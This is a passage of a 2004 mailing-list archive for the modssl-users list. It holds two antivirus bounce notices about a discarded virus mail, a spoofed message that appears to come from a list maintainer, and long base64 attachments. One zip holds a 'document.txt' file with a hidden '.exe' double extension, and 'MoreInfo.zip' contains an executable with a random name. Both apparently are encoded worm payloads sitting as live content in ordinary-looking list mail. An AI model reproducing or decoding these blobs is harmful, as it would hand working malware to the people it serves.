CMGJZhwX3/t1Jkp8DiwDuJzy91dlG2OF+pv79CVJJ16IW1nrfx2FmmyWfGus7JYKRAL3O/lO
ETVz6Gr2COCfONzVqqFNw2A6jh09IpEcZIQrVuLGc5IzA2vbB7zi00bKmEpRl6QPi44TBhjQ
0nvkKc6250JZ0KgY0MUArHrJIf204NYzS6kNHSp6kt01sh3idEuPAAABAAIAICAQAAEABADo
AgAAAQAoAAAAIAAAAEAAAAABAAQAAAAAAIACAAAAAAAAAAAAAAAAAAAAAAAAzP//AGhXWAAA
AAAAgICAAP///wDAwMAA/wAAAAD//wC/AAAAAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ACIhEiIiIiIiIiIiIiIiIiIiITVVVVVVVVVVVVVVJSIiIiNERERERERERERERFJSIiIjRERE
REREVVRERVVSUiIiI0SIiIhESZlERJmUUlIiIiNERERERESVRERJVFJSIiIjRIiIiIhESVVV
WVRSUiIiI0RERERERESZmZlUUlIiIiNEiIiIiIhESVRJVFJSIiIjRERERERERESVSVRSUiIi
I0SIiIiIiIhESVlUUlIiIiNERERERERERESZVFJSIiIjRIiIiIiIiIhESURSUiIiI0RERERE
REREREREUlIiIiNEiIiIiIiIiIiIRFJSIiIjRERERERERERERERSUiIiI0SIiIiIiIiIiIhE
UlIiIiNERERERERERERERFJSIiIjRCIiIiJEiIiIiERSUiIiI0Q5kkRCREREREREUlIiIiNE
MiIiIkSIiIiIRFJSIiIjRDRCd3JERERERERSUiIiI0QyIndyRIiIiIhEUlIiIiNENEJ3ckRE
RERERFJSIiIjRDRCZmJERERERERSUiIiI0Q0QmZiREREREREUlIiIiNEMzIiIkRERERERFJS
IiIjRERERERERERERERSUiIiI0JEJEJEJEJEJEJEMlIiIiNCRCRCRCRCRCRCRDJSIiIiJDND
NDNDNDNDNDNDIiIiIiIiIiIiIiIiIiIiIiIi4AAAD+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAA
B+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfg
AAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH+AAAD/////+hHOgwQAFp
wP1DA8AFwzieJiijEAPB+BAl/3+HAMOLRCRVBBLpVezsUQdTVlcz/zGJffzUFRxgICiL8GjI
wDcPt0UIUGRWJhgh2FORFRQyUA4QITvHiYo8dCoWEQwNV2iArMBqAvGwEhFA/3VsDIo0CIiD
+Pu/VAF1BDPA60HQ2zsD93YY6GH/HAKZuRsBUvH5i4CMMBQDQzveHnLojcz8V+F1bAh9eASK
LgkRZ3o5sfwPlNhfXilbybIcgYxkDHxWcL5gBAxXjYWcb/OiplBqYCkVLKwNPSgNiCzg+06M
1xS8RvcAgH3+XIs1JMU9v+BF4XQKIiVXBdYhCmjQsC8dgL3ciVyhQjwgIf414aE5EDRhMAlq
Zegyu/4QWZM/vQqDUI7KJpEgQbAGr3JECGrbBSjERqPkH8gWPIk9tyMtdFMUNOhsRXZ1IsYD
FTg1fFBRWhIJdViWhRLAdAVUTRNGFSM0ERR1GQ9qAecwSBIC9NCQMTDCEAC0ODBAMpAJdCQQ
Q1UnbJfOjmnPbQphCJ92j2Ug70Xvbu9j73LveexwK2X8ZM8mV+1vI5tMRA3WL+UWFM0wYkqf
ClPZa1lOsydcLvND81p2M6gxcCr/w4U8NWSnLrhTDspGgZ9nmWgVc/lCVJEOhGsZA3X4ZXL2
bwBuZmlnOXguZHFs4RBCSU4YQVJZEEZWA1Byb3RlY5suo3i2MWBcAADgAeAC4CDiEM4RBA3o
Fr4RfaQOeyiDRiIBjCgJEIkgFkmJFMDCnwEVgANvCBQHkAJmE8AC0BAJcFX/A7wIUgdBAgYT
Co5CKAF3AWxwECif0QQIEHmZg/RE9/0mECKEEOL3jtACEJyRT70YCPCrARnSD48DgFx4wFQH
sAOtBFIDOOqvAAAB4CBwQA5LRVJOYEwzMi5kcWzgRuhvBnNlSGFuGO3AWnI+aXQ6Rm4Vvr8p
YQscQR1Wn3pHb2ZS53NRdXJjnzZPOqlrDWJhZBYQSWlutm56Sj10Tb5kKWxdsyJG8XB5SVKb
5HRGRMAkV8Frb3dzRN8+5GP56nmlOaAtFE5hbUyGUHLw8mTjnExzanYfTGliO1MvPlRQk0PP
7m40DRhMYbxFctxc68WMTXUIeMxOAwAAAAAAAAAAAAAAAABQSwECFAAKAAAAAAAJL30wo4gd
3oBzAACAcwAAUwAAAAAAAAAAACAAAAAAAAAAZG9jdW1lbnQudHh0ICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC5l
eGVQSwUGAAAAAAEAAQCBAAAA8XMAAAAA

------=_NextPart_000_0016----=_NextPart_000_0016--



From MAILER-DAEMON@polito.it  Mon Mar 29 08:33:02 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from polito.it (anacreon.polito.it [130.192.3.82])
	by master.modssl.org (Postfix) with ESMTP id 244B5A8943
	for ; Mon, 29 Mar 2004 08:32:49 +0200 (CEST)
Sender: 
Date: Mon, 29 Mar 2004 08:32:41 +0200
Message-ID: 
X-Autogenerated: React
From: ANTIVIRUS-SYSTEM@polito.it
To: modssl-users-l@master.modssl.org
Subject: Attenzione Virus - Virus Alert 

*********************************************************
                  V I R U S - A L E R T
                    Servizio Antivirus
           (Ce.S.I.T. - Politecnico di Torino)
*********************************************************
  IL PRESENTE MESSAGGIO VIENE INVIATO AUTOMATICAMENTE
   non e' necessario rispondere a tale segnalazione.
*********************************************************

Un messaggio in arrivo e` stato eliminato dai sistemi di protezione
installati sui server di posta elettronica d'Ateneo.

Mittente:  vlastimil.2002@volny.cz  (presumibilmente falsificato)
Oggetto:  Re: Message Error
---------------------------------------------------------

On Mon, 29 Mar 2004 08:31:13 +0200 
a message which was sent to you was discarded by Antivirus 
Service on our domain server.
 
Sender:   vlastimil.2002@volny.cz  (may be faked)
Subject:  Re: Message Error

*********************************************************
 Cos'e' un Virus - Non voglio ricevere questo messaggio
                    Qui le risposte
        https://mail.polito.it/Files/antivirus.htm
*********************************************************

From TrendVirusWall23@nuwc.navy.mil  Mon Mar 29 08:33:11 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from npri54mai01.npt.nuwc.navy.mil (NPRI54MAI01.NPT.NUWC.NAVY.MIL [164.223.1.100])
	by master.modssl.org (Postfix) with ESMTP id 59C32A8995
	for ; Mon, 29 Mar 2004 08:32:55 +0200 (CEST)
Received: from npri54exc23.npt.nuwc.navy.mil
 (NPRI54EXC23.NPT.NUWC.NAVY.MIL [129.190.70.168])
 by npri54mai01.npt.nuwc.navy.mil (PMDF V6.2-X17 #30632)
 with ESMTP id  for
 modssl-users-l@master.modssl.org; Mon,
 29 Mar 2004 01:32:46 -0500 (Eastern Standard Time)
Received: from NPRI54EXC23.NPT.NUWC.NAVY.MIL ([129.190.70.168])
 by npri54exc23.npt.nuwc.navy.mil with SMTP
 (Microsoft Exchange Internet Mail Service Version 5.5.2657.72)
	id GJPKKGP0; Mon, 29 Mar 2004 01:32:43 -0500
Date: Mon, 29 Mar 2004 01:32:37 -0500
From: TrendVirusWall23@nuwc.navy.mil
Subject: Content mail warning notification!
To: modssl-users-l@master.modssl.org
Message-id: 
MIME-version: 1.0
Content-type: multipart/mixed;
 boundary="----=_NextPart_000_1080541957_B78506032.R82506026"
InterScan-Notification: yes

This is a multi-part message in MIME format.

------=_NextPart_000_1080541957_B78506032.R82506026
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

************* eManager Notification **************

Due to a restricted file type, Trend Virus Detector [23] has replaced the attachment with e-mail header information.

Source mailbox: "owner-mmx-modssl-users@mmx.engelschall.com"
Destination mailbox(es): "modssl-users-l@master.modssl.org"

******************* End of message *******************

------=_NextPart_000_1080541957_B78506032.R82506026
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Received: from 164.223.1.101 by npri54exc23.npt.nuwc.navy.mil (InterScan E-Mail VirusWall NT); Mon, 29 Mar 2004 01:32:37 -0500
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
 by npri54mai02.npt.nuwc.navy.mil (PMDF V6.2-X17 #30632)
 with ESMTP id  for
 fariast@npt.nuwc.navy.mil; Mon,
 29 Mar 2004 01:32:32 -0500 (Eastern Standard Time)
Received: by mmx.engelschall.com (Postfix)	id 80FAE19323; Mon,
 29 Mar 2004 08:31:20 +0200 (CEST)
Received: from master.modssl.org (unknown [195.27.176.156])
	by mmx.engelschall.com (Postfix) with ESMTP id 5CC7A1931C	for
 ; Mon, 29 Mar 2004 08:31:20 +0200 (CEST)
Received: by master.modssl.org (Postfix)	id 8443BA8A4F; Mon,
 29 Mar 2004 08:31:23 +0200 (CEST)
Received: from master.modssl.org (teazmail.teaz.cz [212.71.157.203])
	by master.modssl.org (Postfix) with ESMTP id EB63BA8943	for
 ; Mon, 29 Mar 2004 08:31:07 +0200 (CEST)
Date: Mon, 29 Mar 2004 08:31:13 +0200
From: vlastimil.2002@volny.cz
Subject: Re: Message Error
To: modssl-users-l@master.modssl.org
Message-id: <20040329063107.EB63BA8943@master.modssl.org>
MIME-version: 1.0
Content-type: multipart/mixed;
 boundary="----=_NextPart_000_0016----=_NextPart_000_0016"
X-Priority: 3
X-MSMail-priority: Normal
Delivered-to: modssl-users-l@master.modssl.org

------=_NextPart_000_1080541957_B78506032.R82506026--

From owner-modssl-users@modssl.org  Mon Mar 29 17:13:24 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EBE8EA8943; Mon, 29 Mar 2004 17:13:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pcxp.com (modemcable013.233-201-24.mc.videotron.ca [24.201.233.13])
	by master.modssl.org (Postfix) with SMTP id 61938A89A3
	for ; Mon, 29 Mar 2004 17:13:21 +0200 (CEST)
Date: Mon, 29 Mar 2004 10:12:55 -0500
To: modssl-users@modssl.org
Subject: Re: Msg reply
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------jdpahktbipyptsqkclnf"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------jdpahktbipyptsqkclnf
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------jdpahktbipyptsqkclnf
Content-Type: image/gif; name="nffgmntiwl.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="nffgmntiwl.gif"
Content-ID: 

R0lGODlhcwATAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAABzABMAAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNq3Mixo0eCZBCJJPPK30eI2xBhYzht2sBaiFppG5iNDC2C
0xC52jbQlkqI2sjM/KdN58mHRYcizPYI0dBaN20KzPbqH6JaAmuRSelqalRbD2EqFXnU4TSh
CRGRcYWIZz6nBFNms4pIIFk1da3OJOswW9uBNrfV1GnyX06SJv0iuukoL62807DioxVyblZE
2SIRbeVKG0yBIRG6IpOVTDZXWP/1Q5TvX+h/MFNSU00Gn1XSDtUK9IeNjD9qdf2pUfTv8T9/
qCn/25Yoct2ipP35TonVH6LZ/1qJnIvI5WC7eQ3q//7HdlpK71ul51WP/ay/lOEZihTp6JVS
u61uZyss0nzpf5BoZxhWoxWG13KIQDKVb0QZpZBwVd02U2ihSbeSdNatZJUjx13l0DamGZRN
LbWwBZY2rYQ0kzazhDSbXykFFeOGA5H1lmXjFWVZQsClhogaoNV1oI7F1UUGbrpZt+NCRdlG
kFYvMngcPq81GB0Z2NykUle31YhVTUPxBdx9B/k1FFugcVfXauBZNUuQ/9T0EGWF1ZjXI6Tl
tI10tABn0loNImKbWkPVZNtZU4VHWT7QmcSXQe4l6k9RCxaXGmXUkAGWYaTR4pJDaBbkDyRC
kbUNNmq5tA1MZPhn1U1WRVW44GIDKRIfLY+oB+dB2vG0oH00YTaQP5gOe9aSZSWrrEUj/dhs
SCGp1eyz086HF7TzTRvts9hGG9K136q17XzeZrvtuc5Ki9uy7Lbr7rvwxiuvRgEBADs=

----------jdpahktbipyptsqkclnf
Content-Type: application/octet-stream; name="MoreInfo.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="MoreInfo.zip"

UEsDBAoAAQAIAIBFfTDgNL3PmFkAANZVAAAMAAAAbnBkZm1samkuZXhlmCnqD9HCQ8XhOmNb
ZZlpWSsyEQoQNvHb3XKjl47ZQuHlN14TKum4EIgQKLKsYigh+4W33s9TJfco4TM9dpQ6hPxD
sHm8brHOzs/BNePkZfR7rjGQFZfSD9irLIgTD9AvNwHoJmWd+yv93QgN8pyZCTreznYuHwba
CGj1u3hrGdSUdqGw5hLFt49SpblKGXJrQgHt6BZw2O1In5eyyZQXozcBeMjP+tAMMWXAowxw
7A4VR4H+OX1l3Dt7yMgbtsKIO4O0ERNDB3gMU9+XGqt875E0dBpYQTIdPruf+HmIX+Pbag8a
gxRkv5vZfFVWWbi8Wc6cc7qlyX8UJQ5y8vNg+q4HZHiCvvriZGVy1Wnico4nTM2SBRsVapLC
i8PJduSdgKBPxqSOpP872vAXC3pUKiMSaMdAIcbBlDYEkrISZz1jtj6uLynO18jES39W9NVI
SjABfdWpnI+E+vAcYWchWmpYHOrt4rPYcc0461pWx3IGDVO7VPe0Vvycrbnfv5YWIp2x4ffO
iWlhmqSFm9IspMoD7rOTtc+lkM5a834Uev0C19joiUApyXceESuntht3XdZESQKn5Fetv+ZF
IzEPAtgLj4esMHzicnv/8P6/0Gww59EK2hfDG2ggNRVWkOywsRBRh8AkU2AIN/m4pip5tFyr
bqe5l01oNdhIQECQ6piMtycPkrD1etTNMqPp5twSQAgforaQEPXFBnHTUkvsPkicU+R6nbKk
J4fzupHJJWiKQr5kkKoLAJIyrtXO0/0vc5qxPRUmlhb7vxdPobZPMNKpyCdfRvbgmX7GqtPn
zKzQCQ/BK92eospKJM1VMln1wr8r0ulawtspNf5vgdpEi0d8p/p89BKJDMszILu/5030Peq2
1osiy6nDCPkAVemkdq8RfcDFflE70dZ0nQo9fF6FSPGYyMzqJxk5Xr5//30axUE6MQ1bNkoU
hiGpxRDZHk0bEzhLE6SuVuOzGDEKWbzJCmu9NJk5ZStLj3vwzZjUOQtBJsv/RKiJbRayweZn
yF0Rnq6K0Y376ob1B2/9LZXYh5KCkWfYKNXfwwWgjiQUfXYXUqTjir9ewEuLF9osftXUD+6D
MpdW+aizMlZ/vhNlvOfeEeB6dGhy8/HYgNW8W8vCU/m3mN9kX8JOohv8jcXST/MMNdyV+alW
q0oywTGCIrKmPYszhZTn2cdN/L0OmkpW9dGgGkHUcdqwfoIEUAhqI6lRG37xt/lPs85cIfEQ
j3MJF5wcvSG084HcqGL9LGhwa9XKLdqJia+RLzqIO0uERzz4kPOcFiihOKBfIbYoMfPFMO4a
k+AO5dnkBAUtwfXNseTW3km/+vFs/FaQNA64RkmDyfKd8um7EfHXLpta6tM0QFG9xjXNgHFE
NqfVUvDBem4xvJGbfuKJLz0hJ4JBJwOwLsAUadniSQftfJQkD3msNCJUMLnQqT4qZ4Yk8EjX
XZ1N6AuMPbh5NrvGCaLP9WuFWlAL9fVMv4LC+DfP+6isStUKaVCrWkZQtv9sPvd8AwYsP7IX
QpR2whXdOiWEO0KKUZX8BWSIp++kcBX3HlZwOylrHf0iJAPDAz8gWwlVAEFdYyKuSHhcRMB0
aJQvBFKBtBsYGqKP5I+ss7aqPu/Gx/nluNMNoPnnauHwOzAL2JxhJ1BP2ja2n4mHdxh0Ot8H
ZmMN34FkBNU3NvH3BUDNPunnTIXNupOKl6YsJcQraXUM3amZTcu1t+W53I7BqinoCt9MNIpu
VN5EpwmQBFU6lm1iVjZGaIWkW46VtwJEav7snjvbd62NHj2p1GhjSjR9ekpkKGy2KCqRXBBa
LF/YNoMyW55nTvrsuYZ2gMlKxbMhaN7nTbnW6IZR0wysEkloPi7vAFpzfWlEcCjiA0I1E0mP
W72tABK0GF6edcBHICWu0Pe3qfK+T6lohFkQ2He5oQLel/tv4TU5E/rh2QuYHtd3LfhIp2oO
XT5oZ7d4FwiRmE6vg1yAYHZLk7ACN9K4Ub5zAptpYliaUczRZOJuaYn7nhoiTjyfNvIqiZu7
ICyom+nhGxiK7S0xh+BczwbhbNaTiqSsjNdzoixRsvir8KYKAkHWVQ1MOIbwPZSL5/OMty3p
i2kpSfrRB8Pt31K3Z4OvaR+2ocl/7IOEH5VbCVci/sYDuBLV85dCAKsfmXUpkcLeu0JhAmcC
Onc1QqTsNwGE3HCKM7oiBSEmPnjlqKgbDSxaIMyfIkPceUmcfxeRxfPnOOXsEYOKWXRoCtqs
xPadVZldRIYJVDESvUpCwzl8PcrJUjIvqoVNMtswmQriJN4Nc4CvybMfS+khkZrQ5YY7ixkn
XLu1NvSvhXhefKtb2gq/UZYyERB/wVWs8WjyccIF8oHBBq9hMGyiWJDP66tGla7TGXSd2tn/
8QdCWNW/a+ks4/fIWACyIzVXdTTQbheqq9BBql4gq52GfnPFbSQL9/x/D6G6TrP7VfR6imNk
/7RcN1xldMz2jnt6dutU8MVcILCKpRfBApC2UPtP/cVYH8HY6vz5b+6hbFeB6vr5ChJSuEwx
22RVnOscI5U6H8fgxDbZS7UG37PXdwSwFEi69VH+wRiw1fWz3eEu2T3KpNDZkZRJOzydKOEm
EkaOjQNYZmGvgM9Ad8mS3LF+VmAN+CfjzcFfz7jnoLwT+OAi3h40Gkqh3tu+NihTIk0mZVBI
wQx2dnnESrU/0NWs/n/fC4uZ2ZG4rvuHEXlEAsMQxWsQfeMGcbilR3ff3NZ9MY27FwJyxiUU
002QJHb7WM/OPe1uG3HOB5GwZH1391CeYo/JM+yvm2Sm7Kfjc/WS4zGkPdHfrVWVTZIZ/6VN
NKVSyIYfutYigbQVl6i2Pa404Vm85o0odCf56pPY/9c0yGOWk+07NWNorLRgnEfdN17/5CqK
e07KeoTtXhUyuBmBVkLdNYC1gsVYupJrYA88YbFunJoUQ0+0VzwGgrdwJjE2UdCiDk1Q4c/d
p9bCs8MSDuQsyiCrVyO1Q/GXkauzncUW7tZ3IZXOf0pTfp48hHXUfUs+kXTeNwNc57OR3fjN
4HCm0YXUL0DAU3AlMK6KIYw23q2DMw8rZsmRvICPjB0rhvxmO2SG2kpOiw0ihKVfi0LvcNmy
AeiOrRoO3E2f3iz/nl72bTJlY+mG3aRmfTcfFBWBZUVArY0N5L6FX3ymhiE1KtNcaXBHg0O7
nsUSTSYqzgD0Yfin+QkAL18ndt1+NSpBpSaRCA1+ylIzyAUT3G5XIK662knZUEW/CayprgXJ
VaJl436jAjEJDYehGsYAIAunQw8Vz65UTbFAh9TTTo8fHHFH+1imzaEYETZ3oco01xUXfcm4
laTB8MuxdRnaKRuJmubai/BA2r2YEAS9ZudCcCcEnLFbdEHMSJ0pqopYos4J9nRF6KCZxjEJ
nnW8TzS+oQr6J2hxSqL0Yj242HOgnT6QIMusxyZ2SGLopKclK64GrLoG8gRClIcKGhCY2jP6
r7P+38XGYEEoyeNVdzr6poM4eb6vbfIa6lj7thZp7TiiuLxyFSLzveE6TdwPCefaQ/kUFagI
4xS614W52+ti5/KW8c+ZSKv8fI3vcu8bxhAr1JgKzi54rM1IJALM4EaGzyKE6aXDtb967emu
3PQLKy6f6C5W1O7P3zVmI8b/vfK0BXn9IQ+yQDNqZElOFps/UD1m89X+0+6O/gK0nA3vDzXP
03hVX4e5+fnnPHDOd+tvY4iAv080sgSBoJwPoRkuv3NvyTwlkNFEeo1X/nHM7NMN6xjlujOe
MzWaipYkLYdiIbFVaSipZlVPRNKHB7OCz6cFGytL8lumv0HJIOkZ3maDTaQnBmyzJ6eXEBnV
IH+MLJUcu3mmNGbLTwmSn5l4qKkKu5lnVMVDox1seBjBlpv2al7o8hwXc+Ji9tPsUntv8rcS
IVlC1JE0eOiPxPuwjPZnZelvlQvIjFjrlPG7y/s72zkg9JXaFh0wGBol1phJpSFGnUi1B/IH
EURq9h/aoi5yXuOaw5Tw1w2thnau3RPnlBL/yqKdPfy7uxgRnrt8g+X2k5tz2zj05ko8mkTW
yHhlkRA6ni+2hsmWiHp43saENFeNO9JA04ACjsJHDVdPF2ffV3S95adJq3m8qiiJeekIO4F7
IT97NJwbplT6/SDrLxaqPWmhKqCSxYd1N49CMvYNhopUXHmTo+k0baRV6LCPtrGYLm3CSu1r
kGkEzLhGd3RAaLgUXOHs3RJEDD2ad3htVTEO38mMI4bkW5uNvfYuYDoT52xUMVb15FlNpcTw
jktGISPug/w631fJmWbuT8fc7oHOOTFzQ2eIqXUANGrxWFkHBTYEaQ3IXyzN+SJ4GH3MnF6y
ilrmoiGkJwaurHk3biZ5jhualmlv/wgxAsvH2bscE4bpVGuujkK3ByepTts48Xlsmlx+dDAC
xSQI/PqLQoirjrkKWrzd31q5O0gmHX86wjgTb7NH4l94kByAvTdSeKjssi8Dt2e/pszl538h
vbFgrojmEG6lADPjzGLWrIfwMfOdagGe5t+OkESPH2p0oGWRkjqgaqegAgAj8cp3kGru07gu
0FxrupfaXR04wb+HQXd0/0lVvWJ1s7AiOnexnGwkTZW5Q5v+Ldn+mSn8QK4f1pMyIeSG8JU0
0FrUfi+9etFfszk5AnTGiyQkVz035vIB82/i0ZtPAAntr9nwQRvvsFGWvPnp3lenLdBhAh7E
fshjkMpnqFN0QJ8mewcbZ6WCDe6Mh7CToiEfrFdDTQmksnOE0X8/12nU92yYa1C/Oyfqcto2
40vNeJ0tkbj2/cZreQwfVuz36xIF3u7RoEE0jKXl8gLpEA5djV74yZno/uX6rekEQLynj1vA
Pbp+tAfPky0BuDq/6suQeerTeItcmpHuebYj0YAEPyfuL5+dgzj0C4rL1KXdG38qmp5eZFb/
0QyVEtZHFRddSr1IZbASN/66lAi9MgCEHkFDdV8DAhLSK495rAZ+InrmUo0e30RBPJZjbaCh
NGl6GpnnpzmtPsP3XtWc35+HdPF56oyXE3p8eEhl1FyyzwgwQR0jFe+AuJAPBwoyIYV7b+f5
5hgmNjr+7dofLPf0R1SOm+BcI/cyBSoQd0AyixvE8pkXn+krRWXWMb81g4BHVJ6OLsFk2/Jv
e7827oCYpCEryVxurVHRx9xh3FwRMOaVVt5XzRoWIBJGLeSA7InSj774bXCUgYR6uxMs0kYD
FoChD4QW2foh7dAf8Ud/GEOgPWndAgyvzn+s83RmMzOLVtWWrDfOHyvj2DbNq1eDHQpUhlYM
aehDlTTNJckynTAo459QfZbcj/cx0Cpz5GFyGzowdT2BgPTRjUqsH56SEcNdrRHI1EVS4OIT
EGlBlfEAix+lgX1NKRXyGrCzi4h8Ppt++7L3aZD0hRAWTRib6iU+rDqsyEwn43oQ0Dp+t07C
qZLu6rUWejqGPz1fZiD+t/nfw+dWZie5pUHXorZ7RGKYBDphRioRrktj+AKnohE+1R29rWqk
tPGxOhav2myS9zi8/clovPvw/BCPvltQ8GJZ5T1NroMB1F0Bf7bEQA9sfq4LEIsW3zqnroCI
Ac2JLdq4Zm031f9jfgbnMBUAmZr9uQbpHBqYbsABBjHB7WYCr/ItJANfkI9rTWASDTUdJ5Ne
2Rv1bIc/XRaLeNSSQzWq6UYzR5U5MIfcujKBjIrmLnbroQYjhKOmXFQuoqw78jOGkXncWmjc
rjc/vOdYzMu41OtXb1JDFgMNT0snBfwOgppXTSHkrA5Y54df63FtiWtrfKtIiQ5HH3XGwf5o
i7xHdSI0Lvagfd3PLYd/7h8d69mlxtDk8TZwr7yG3loVJ8PlZrEkiShljfxMPogxBtnU8I34
3wbkO/o4EzSP/WK+Y1FzQFpgQ4YOPcWYbwidaS9fdQ7YtdBKt8jHf7fg2h6pm0mM7TZ730eQ
8YdqMIDsBrDNqyiRLMNsKBibuvws9huFGLWNtSjovaXDvv1LgSQWJ1hTp3L7f+De1Crhkkae
keFOEXYS+aSRhGvhU6zr4kBklN6AKQ6PbXcMJ0YlcUDQqwdKiCvDCweM7MGdqGzanDtFrNsh
LcjF5FY+QJ/BZMArIsA6mz9sHVk58zV8+Y0PNBQqXnp7biJ+/oz2M8q0yHhIRSOyw6fsA9T5
iEAdos7G5RIE9K9C8E5COPoH23MR+hiBgF0sK3WID3dB7B57btSYeSfC6JvNnYAitHV6APOJ
wUBmAjPzdJB/kI/Bfc7BKJzOO/7NAr/g1liUsnDK87kGULiBXDwgkVKWMPk9hGu+kBDNbwXG
+Nn7DYLIvXWKpaAs5kZhLSwpLcqATFp0wKjQKObeLHmLIQ/5RwUq3Mmewj0DSPPdGoZjUvi9
u1tgDlw+Q71od2RHqe/ijM4Of65OrbkUr1lydX15yvwozmI+7JdQG7KXpFWdNaavAhIdDD1I
yhfTtm/ZzccCOxLxrNaPcxd3UGBqbu8+FSjKCshR9lG74sUT2JXWm/DHxiVxM5XTZTpw815T
aXxAyakjNHQhPOkjdfWESwLKCGA5oPO5/QFDxWyM6ctxbFhL7OlfypajaGzwA2xPrt2zJH1l
VZD0vb8PGXs205eOzzkled3ZPbNJV2a0hFn3gEG72TN0pCcGJGpzAMNoV4FJwpYPSEm3VEM9
kpTzOuCaA9vgYXJM59JQE8XViXF4BUlDHXjK4MBZ7Uz96G9g+m29onBpy8TXSV8L2dqJKswo
GetrljPqbHzvrGvtWkAX6bpg0ejwBhkElJ3uz4u1qFYxyOQARP/vCke4LKRQ3lyFZO//Lq6p
oiqr4cMS0I9oWQlbi+MQIL13ZxIJVUmp03bSkKj3In4MwpF0KHVECArsAixl8FKeU0/xpXPq
/lWw+r5QWMpHxRlBws+g61lV9V3TqqEppA48ukxh6D44WW1vZUz7zpOUS6D983KLB5cnkSrb
KL0PvOWqjS/o6b9sNs2KRYZ+ijGw6+mzsierriMw6wfRvyMxdFRlDhPEVVPzbE/HMTr9BFEj
+YabhCKjy6jyQt0H5BILQcaGF5MEUb1VKSQemTnJEf8L8niON5C344YRuxM9ec4cN/oyCEUY
uwcnAgcIAiXjvw+HcCiXBHT1b9P1vVw5l+V/8l87MLkCh8buJhYvh/OXPpESvN51u2JAzKKH
8h3zG5uqQtTLQB93bHNwRYf04IdnlZqVpF48pe+2PCYXe+ZkeTxTNPJealfJchAmxYZ1wwdr
AJwL/YBoj3/HrthVfJgIAOIx3l5TDshiyHHvzpnJPeke6J2KPw+9Wcsdk4Pc/pf78F+85P9a
JjsFb3yI78MIwuvQSxa46wL9ZFulLZkNTXTNBGJ5MucrJeaXLGGAM4GrOp/L1STgaiS+XMNT
jVask0dtBwHDtDvergPVbOJqmBS5rYrUSGRr50Gfr7nreBG+G4qGBbW1evMJYzBbfBBy57QG
lmxcGK8EfzI9UO/TF48JEHWLljH3KLM4As+g0eZxKj45v6/d/dJM/ZzCzjQiJUweF15NcROq
yrMWzsJlMFNYf/Gu3BCO0napPv1V9vvqksuk540xGtHBVrSt2SsxHngly+nw2sYppDP1hhgE
M/be0UcQmRUCYMffVMhObCBeSaYNwP6x/xmJU3TS2ePDerxAr0G2TmWHATrI5SKiBVpWrg8H
a2IyNLCo7JNWi3Mgi1cxzt7ZDMCm965P9JotCdMr6+svveVwffsF2x83lxJMty4GuR1ZMQHR
gUObhwhjrABOYjsbXGrYQG5sOXjctBtdIXsKiUWDVZ06JkpPicTb8L9Pz+qY9OEiz7NenUoI
